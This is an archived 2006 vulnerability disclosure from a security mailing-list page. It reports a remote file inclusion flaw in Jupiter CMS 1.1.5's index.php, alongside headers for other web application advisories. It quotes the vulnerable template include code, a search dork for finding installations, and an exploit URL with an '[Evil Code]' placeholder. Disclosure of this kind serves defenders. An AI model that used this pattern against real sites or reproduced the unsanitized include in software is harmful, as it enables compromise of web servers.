Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21648] Fotopholder "path" Cross-Site Scripting Vulnerability

[Full-disclosure] [vuln.sg] Cybozu Garoon 2 SQL Injection Vulnerabilities

[Full-disclosure] [vuln.sg] Cybozu Products Arbitrary File Retrieval Vulnerability

eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability

From:	D3nGeR_(at)_Gmail.CoM <D3nGeR_(at)_Gmail.CoM>
Date:	28.08.2006
Subject:	Jupiter CMS 1.1.5 index.php Remote File Include

#################################################################################
#
#Jupiter CMS 1.1.5 index.php Remote File Include
#
#F0und by : D3nGeR
#E-mail : D3nGeR@Gmail.CoM
#################################################################################
#
#                                   the code
#$template = "default";
#   include "templates/$template/id.php";
#   $db->updateRow("config",array('value' => 'default'),"variable = 'template'");
#################################################################################
#
#                                   The Expl
#
# dork : powered by Jupiter CMS
#www.sitename.com/path/index.php?template=[Evil Code]
#
#################################################################################
#